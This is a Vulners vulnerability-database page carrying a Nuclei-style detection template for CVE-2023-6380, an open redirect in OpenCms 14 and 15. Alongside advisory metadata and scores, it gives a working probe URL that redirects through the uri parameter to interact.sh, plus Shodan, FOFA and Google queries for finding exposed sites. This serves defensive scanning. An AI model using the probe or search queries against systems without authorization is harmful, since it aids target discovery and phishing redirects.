Vulners
Lucene search
OpenCms 14 & 15 - Open Redirect
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | Alkacon Software OpenCMS Input Validation Error Vulnerability | 13 Dec 202300:00 | – | cnnvd |
 | CVE-2023-6380 | 13 Dec 202310:54 | – | cve |
 | CVE-2023-6380 Open Redirect in Alkacon Software OpenCms | 13 Dec 202310:54 | – | cvelist |
 | CVE-2023-6380 | 13 Dec 202311:15 | – | nvd |
 | Open redirect | 13 Dec 202311:15 | – | prion |
 | PT-2023-32635 · Opencms · Opencms | 13 Dec 202300:00 | – | ptsecurity |
 | CVE-2023-6380 Open Redirect in Alkacon Software OpenCms | 13 Dec 202310:54 | – | vulnrichment |
id: CVE-2023-6380
info:
name: OpenCms 14 & 15 - Open Redirect
author: MiguelSegoviaGil
severity: medium
description: |
Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template
impact: |
Unauthenticated attackers can redirect users to malicious external sites via the uri parameter, potentially facilitating phishing attacks or malware distribution.
remediation: |
Update OpenCMS to version 16 or later.
reference:
- https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alkacon-software-opencms
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/msegoviag/msegoviag
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-6380
cwe-id: CWE-601
epss-score: 0.01594
epss-percentile: 0.72654
cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: alkacon
product: opencms
shodan-query:
- "/opencms/"
- http.title:"opencms"
- cpe:"cpe:2.3:a:alkacon:opencms"
fofa-query: title="opencms"
google-query: intitle:"opencms"
tags: cve,cve2023,redirect,opencms,alkacon,vuln
http:
- method: GET
path:
- "{{BaseURL}}/system/modules/alkacon.mercury.template.jsondemo/elements/jsonapi.jsp?content&fallbackLocale&locale=en&rows=1&uri=http://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4a0a004730450220724aee3f1be2a27c3e6b204b0c095d19e7c47bbfee19a374883f74f2764be89a022100e8cafaab40ae96c33de1137b109918ba472183a34f2c3eb03842026e3e8fa4d7:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.16.1
EPSS0.01594
SSVC